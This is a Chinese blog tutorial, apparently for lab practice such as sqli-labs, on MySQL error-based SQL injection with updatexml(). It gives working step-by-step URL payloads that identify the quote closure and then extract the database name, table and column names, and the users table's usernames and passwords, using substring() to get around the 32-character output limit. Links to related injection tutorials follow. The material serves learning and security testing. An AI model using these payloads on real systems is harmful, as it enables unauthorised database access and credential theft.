sql盲注_updateXml报错注入

已于 2022-06-03 01:33:06 修改
阅读量579 收藏 3
点赞数
文章标签: sql 数据库 mysql
于 2022-06-03 01:30:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sugar_by/article/details/125109099
版权

函数updatexml(XML_document,XPath_string,new_value)包含三个参数
第一个参数是string格式,为XML文档对象名称,例如doc
第二个参数是路径
第三个参数是替换查找符合条件的数据
updatexml报错原理
同extractvalue()一样sql盲注_extractvalue报错注入
输入错误第二个参数,即更改路径的符号
正常语句

select updatexml(doc,'/book/auther/surname','1') from xml

在这里插入图片描述错误语句

select updatexml(doc,'~book/auther/surname','1') from xml

在这里插入图片描述
利用updatexml()报错注入
判断字符型/数据型

?id=1

在这里插入图片描述

判断闭合方式

?id=1'

在这里插入图片描述

?id=1"

在这里插入图片描述

可以判断为双引号闭合
查看有多少列

?id=1 union select 1,2,3--+

在这里插入图片描述

查询数据库

?id=1" and 1=updatexml(1,concat(0x7e,(select database())),3) --+

在这里插入图片描述
查询数据库表名

?id=1" and 1=updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database())),3) --+

在这里插入图片描述
查看表的列

?id=1" and 1=updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA=database() and table_name='users')),3) --+

在这里插入图片描述
查看表内容

?id=1" and 1=updatexml(1,concat(0x7e,(select group_concat(username,'~',password) from users)),3) --+

默认只能返回32字符串
使用函数substring()函数解决只能返回32个字符串的问题(功能和substr函数一样)
substring((字符串),从第几个字符开始,一次输出几个)因为有32的局限所以每次开始的字符都要不一样才能拼成完整的答案

?id=1" and 1=updatexml(1,concat(0x7e,(select substring((select group_concat(username,'~',password) from users),25,30))),3)--+

在这里插入图片描述

是莱莱鸭
关注
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1503
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
SQL报错注入updatexml
2301_78549931的博客
08-05 2511
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
iwebsec-updatexml报错注入
最新发布
m0_60984906的博客
03-18 464
iwebsec靶场sql注入updatexml报错注入
SQL注入漏洞 | updatexml报错注入
weixin_52116519的博客
12-09 1159
XMLXML 被设计用来传输和存储数据,是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数:XML_document是String格式,为XML文档对象的名称第二个参数:XPath_string ,代表路径,Xpath格式的字符串,例如。
sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2814
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3673
报错注入updatexml)常用语句
SQL注入--报错
qq_57307348的博客
02-10 2042
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 布尔型 基于时间sleep() 报错注入的前提 页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
SQL 注入报错注入、延时注入、布尔
2301_77160226的博客
08-27 1526
SQL 注入攻击中,报错注入、延时注入和布尔是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理和实现方法。
sql报错注入(附自动化脚本)
xiaoi123的博客
12-29 4806
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是了,此文是系列的第一篇,介绍中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Duplicate
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
SQL注入报错详解
DM766924的博客
09-15 1885
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类型超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入
SQL注入之错误注入_基于updatexml()的脱库原理
热门推荐
wangyuxiang946的博客
06-21 1万+
updatexml()的基本用法、报错原理及脱库步骤
报错注入分析之updatexml注入
aiquan9342的博客
01-02 619
PS:今天元旦,家里打来电话说,今年春节要回老家。心里倍感恐惧。可以清楚的感觉得到父母说话的气息没有底气。大概如同我一样是恐惧吧。加油吧!努力赚钱! 先丢一篇很不错的文章:http://www.moonsec.com/post-299.html UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_docum...
SQL注入updatexml报错注入(函数解释)
m0_74608722的博客
06-05 1147
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法错误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会报错
updatexml报错注入
q1314q520q的博客
08-12 692
updatexml报错注入的使用。
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1786
这题相比前面的11到15关由原来的登陆册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1567
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() —>布尔型 基于时间的sleep()
SQL注入详解:查询方式、报错与实战技巧
3. 基于报错SQL,利用`floor`, `updatexml`, `extractvalue`等可能导致错误的函数,使数据库报错并从中获取信息。 举例来说,`like 'ro%'`用于判断字符串'ro'是否存在;`regexp '^xiaodi[a-z]'`则检查字符串...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值